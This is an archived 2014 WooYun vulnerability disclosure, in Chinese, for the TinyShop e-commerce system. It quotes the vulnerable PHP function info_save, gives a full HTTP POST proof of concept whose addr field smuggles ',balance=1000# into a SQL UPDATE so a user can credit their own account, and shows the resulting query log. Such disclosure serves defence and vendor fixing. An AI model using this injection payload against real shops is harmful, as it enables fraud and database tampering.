乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-03: 细节已通知厂商并且等待厂商处理中 2014-09-03: 厂商已经确认,细节仅向厂商公开 2014-09-06: 细节向第三方安全合作伙伴开放 2014-10-28: 细节向核心白帽子及相关领域专家公开 2014-11-07: 细节向普通白帽子公开 2014-11-17: 细节向实习白帽子公开 2014-12-02: 细节向公众公开
听说通用型给力了,来测试下
之前看到一个它的刷钱漏洞,不过补了,后来一看还是可以。。,只修复之前的post覆盖data数组/protected/controllers/ucenter.php,393行
public function info_save() { $rules = array('name:required:昵称不能为空!','real_name:required:真实姓名不能为空!','sex:int:性别必需选择!','birthday:date:生日日期格式不正确!','mobile:mobi:手机格式不正确','phone:phone:电话格式不正确'); $info = Validator::check($rules); if(is_array($info)){ $this->redirect("info",false,array('msg'=>array("info",$info['msg']))); }else{ $data = array( 'name'=>Filter::str(Req::args('name')), 'real_name'=>Filter::str(Req::args('real_name')), 'sex'=>Filter::int(Req::args('sex')), 'birthday'=>Req::args('birthday'), 'mobile'=>Req::args('mobile'), 'phone'=>Req::args('phone'), 'province'=>Req::args('province'), 'city'=>Req::args('city'), 'county'=>Req::args('county'), 'addr'=>Filter::text(Req::args('addr')) ); } $name = Filter::sql(Req::args("name")); $id = $this->user['id']; $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update(); $this->model->table("customer")->data($data)->where("user_id=$id")->update(); $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find(); $this->safebox->set('user',$obj,$this->cookie_time); $this->redirect("info"); }
从上面来看以下地方的过滤都是有问题的
'birthday'=>Req::args('birthday'), 'mobile'=>Req::args('mobile'), 'phone'=>Req::args('phone'), 'province'=>Req::args('province'), 'city'=>Req::args('city'), 'county'=>Req::args('county'), 'addr'=>Filter::text(Req::args('addr'))
导致可以注入,但是我们并不关心这个,因为用户账户余额的字段banlance也是在这个表中,所以我们可以通过update操作给自己刷钱,而不是用这个注入来盲注。
poc:
POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://localhost/tinyshop/index.php?con=ucenter&act=infoCookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2cConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 161name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#
SQL查询日志:
187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4
看看结果:
改
危害等级:低
漏洞Rank:5
确认时间:2014-09-03 23:30
非常感谢您为TinyShop信息安全做的贡献,此处问题,由多个原因引起,多个提交者都是说的这里,我们会尽快一并修复,非常感谢您的支持。
暂无
